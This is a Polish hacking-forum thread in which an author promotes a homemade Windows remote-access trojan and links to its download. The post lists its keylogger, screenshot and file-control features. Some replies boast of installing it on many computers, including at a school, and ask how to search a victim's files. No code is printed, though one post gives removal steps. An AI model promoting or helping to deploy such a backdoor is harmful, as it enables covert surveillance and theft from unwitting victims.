Nowy polski trojan: Wspomagacz: Reload

wspomagacz

Użytkownik
Dołączył
Maj 8, 2004
Posty
48
Witam wszystkich i zapraszam na stronę: www.wspomagacz.prv.pl

Na wyżej wymienionej stronie znajduje się NOWY POLSKI trojan „Wspomagacz: Reload”.

„Wspomagacz: Reload” – jest programem typu „Backdoor”, potocznie zwany trojanem (Koń Trojański) dla systemów Windows, 95/98/NT/ME/2000/XP/2003. Służy on do zdalnej „Administracji”;-). Dzięki temu, że do komunikacji klient – serwer używa serwerów Gadu-Gadu możliwa jest kontrola nad komputerem, który jest za NATem.

Zapraszam do pobrania i testowania!
 

s@S@n

Użytkownik
Dołączył
Marzec 2, 2004
Posty
112
Jeszcze nie niestowałem ale może być dobry. Mogłeś tylko nie publikować bo zaraz go będą wykrywać wszystkie Antygówna. A tak a propo to w czym został napisany ????.
 

wspomagacz

Użytkownik
Dołączył
Maj 8, 2004
Posty
48
Wspomagacz: Reload został napisany w języku Object Pascal czyli Delphi
<


Jeszcze nie niestowałem ale może być dobry. Mogłeś tylko nie publikować bo zaraz go będą wykrywać wszystkie Antygówna. A tak a propo to w czym został napisany[/b]

Jak to "może być dobry" Wspomagacz jest najlepszy ;>

„Wspomagacz: Reload” składa się z 4 plików:
- Klient.exe – dzięki temu programowi możesz kontrolować komputer, na którym jest zainstalowany Serwer.
- Serwer.exe – należy zainstalować na komputerze, nad którym chce się mieć kontrolę.
- Konfigurator.exe – służy do konfiguracji Serwera.
- Usuwasz.exe – służy do wykrywania i usuwania, „Wspomagacz: Reload”. Przydatny, gdy np.: sam sobie zainstalujesz Serwer;-).

Kilka z funkcji Wspomagacza to:

- Pobieranie Screen’a i wysyłanie go przez GG lub na maila
- Pełny dostęp do dysku (kasowanie, uruchamianie, wgrywanie, wysyłanie…)
- Działający KeyLogger
- Lista otwartych okien i aktywnych procesów
- Zabijanie procesów
- Zabawa z oknami (zamknij, ukryj, enabled-disabled, minimalizuj…)
- Chat z ofiarą
- Wyświetlanie komunikatów
- Informacje o komputerze (ilość pamięci RAM, typ procesora)
- Informacja o aktywnych połączeniach i konfiguracji IP
- Funkcja wyłączenia, rozłączenia, usunięcia serwera
- Zapisywanie domyślnych ustawień konfiguratora do pliku INI
- Kilka innych mniejszych bajerów.
 

s@S@n

Użytkownik
Dołączył
Marzec 2, 2004
Posty
112
Trojan posiada mało funkcji, i nie ma żadnych orginalnych rozwiązań bez obrazy ofkoz. Może następne wersje będą lepsze. Choć nie jest najgorszy widziałem dużo gorsze trojany od tego.
 

FLEJA

Użytkownik
Dołączył
Marzec 9, 2003
Posty
253
Puki co tez go jeszcze nie testowalem, ale jestem w trakcie jego sciagania
smile.gif
Po opisie autora moge powiedziec, ze moze byc fajny ten trojanik, ale z ocena jeszcze poczekam. Podoba mi sie opcja 4 plikow serwer, klient, konfiguracja oraz usuwanie. Zycze powodzenia w pracy nad kolejnymi wersjami.
 

KACZAN

Użytkownik
Dołączył
Luty 8, 2004
Posty
4
Mi w przygniatajacej wiekszosci trojanow brakuje jednej opcji: CMD na kompie ofiary.
Mimo iz niektore trojany udostepniaja naprawde mnostwo opcji, to nie umozliwiaja wszystkiego czego bym chcial, a w wierszu polecen mozna wiele
smile.gif

Zachecam autora do dodania tej funkcji w przyszlych wersjach 8)


Pozdrawiam.
 

domrom

Użytkownik
Dołączył
Maj 23, 2004
Posty
2
sam go testuje-dla mnie jeż niezły

ale na serwer wysyła mi dziwne literki,dlaczego ?,wytłumacz mi jesgo działanie dokadnie?odpisz ,jakby co to gg: 6231672
 

Silver

Użytkownik
Dołączył
Październik 25, 2003
Posty
17
Wspomagacz jest cooool!! Juz go zasialem w wielu kompach
<
Nawet w szkole (za NATEM)
<
. Dzieki bardzo za niego
<
 

Mifczu

Użytkownik
Dołączył
Listopad 6, 2003
Posty
26
A ja mam maly problem. Poustawialem nr i wogle. Uruchomilem serwer i kupa, nic sie nie dzieje. Pomyslelem se ze tak ma byc ale nawet ten usuwacz nic nie znalazl. Probowalem na swoim jak i na innym i nic sie nie dzieje. Klientem sie lacze dodalem do listy nr ofiary i jest na liscie ale nie na liscie online. Nie wiem chyba wszystko dobrze robie no tylko maili nie wpisywalem bo to chyba nie jest niezbedne ??
 

boguc0

Użytkownik
Dołączył
Maj 26, 2004
Posty
1
ej jak skonfigurowac ten RELOAD bo nie moge sie polaczyc z nim, server jest u kolesia na kompie, mam jego numer GG i haslo i co dalej mam niby z tym zrobic? moze jakies bledne dane wpisalem? jak uruchamiam Klienta to mi sie moje GG wylacza tak ma to byc?
 

RaDeK_16

Użytkownik
Dołączył
Czerwiec 30, 2004
Posty
6
Moim zdaniem ten trojan jest taki sobie, nie jest najgorszy i nie jest najlepszy!!!!:) CZY KTOŚ ZNA TROJANKA CO DZIAŁA POZA NATEM BEZ ŻADNYCH HASEŁ????? POZDRO :)
 

NoOne

Użytkownik
Dołączył
Czerwiec 27, 2004
Posty
8
jak znalesc szukany dokument tekstowy na kompie ofiary?

jest jakis sposob czy trzeba wszystko recznie przeszukac?
 

WalgO

Użytkownik
Dołączył
Czerwiec 11, 2004
Posty
495
destruktor -> plik -> zakładka szukaj -> wpisujesz : nazwa_pliku.txt
 

Nereus

Użytkownik
Dołączył
Styczeń 3, 2004
Posty
22
Zbindowałem serwer z plikiem graficznym i chciałem zobaczyć czy działa! Debil. Zapomniałem że mi się serwer zainstaluje. Na szczęście nie zieniałem w konfiguracji nazwy plików ani nazwy w rejestrze. Chce to usunąć! Pomóżcie. Wywaliłem z rejestru odpowiedni klucz ale na dysku zostaje plik SVCHOST32.exe . Ponieważ serwer jest aktywny to nie można go normalinie usunąć ani przenieść. Próbowałem rózwnież kasować spod DOSa przed uruchomieniem Windowsa ale go nie widać. Co proponujecie?
PS> nie moge za pomocą klienta bo ustawiłem fikcyjny numer gg i nie moge sie połączyć. [/b]
 

Plik

Użytkownik
Dołączył
Styczeń 3, 2004
Posty
319
a z pod trubu awaryjnego ... :/
btw: jak usunales z rejestru to czemu sie jeszce wlacza ;];] - musisz usunac wszytsko z trybu awaryjnego ... :/
pozdro
 

Nereus

Użytkownik
Dołączył
Styczeń 3, 2004
Posty
22
Nie patrzyłem dokładnie ale na forum nie ma o usunięciu tego trojana, a jeśli jest to niech i tu będzie, mniej będzie pytań o ten temat.
-------------------------------------------------------------------------
USUWANIE TROJANA WSPOMAGACZ: Reload

Ta metoda jest skuteczna w razie gdy sam omyłkowo uruchomisz serwer (w swoim systemie), który sam konfigurowałeś, bądż podesłany z domyślnymi opcjami nazw pliku i klucza rejestru.
1. Urucham rejestr (Start>Uruchom>regedit)
2. Wyszukaj i skasuj wszystko co ma nazwie to co podałeś podczas konfiguracji w polu "klucz". Domyśna wartość to svchost32.
3. Zrestartuj system a następnie skasuj plik svchost.exe z katalogu Windows.
 

Dexter

Użytkownik
Dołączył
Listopad 26, 2002
Posty
248
Czy ta strona dziala tylko na winshi... tzn. windowsie :) ???
<

Bo tak z ciekawosci chcialem zobaczyc i wyswietla tylko pusta strone na mozilli
ZRODLO:
<

Kod:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN">

<HTML>

<HEAD>

<title>www.wspomagacz.prv.pl</title>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2">

<meta name=robots content=ALL>

<meta name=description content="www.wspomagacz.prv.pl.">

<meta name=author content="[email protected]">

<meta name=keywords content="wspomagacz trojany backdoor keylogger polski polskie koń trojański trojan reload"><script type="text/javascript" src="http://adnet.hit.gemius.pl/script.js?id=LthZP54T3NYaA@fsG4juJvp7"></script>

</HEAD>

<frameset rows="100%,*"><frame name=41 noresize src="http://www.wspomagacz.xlarge.at">

<frame name="pozycjonowanie" scrolling="NO" noresize src="http://www.osemka.pl/pozycjonowanie.html"><noframes><body>[url="http://www.wspomagacz.xlarge.at"]www.wspomagacz.xlarge.at[/url]</body></noframes></frameset></HTML>
 
Do góry Bottom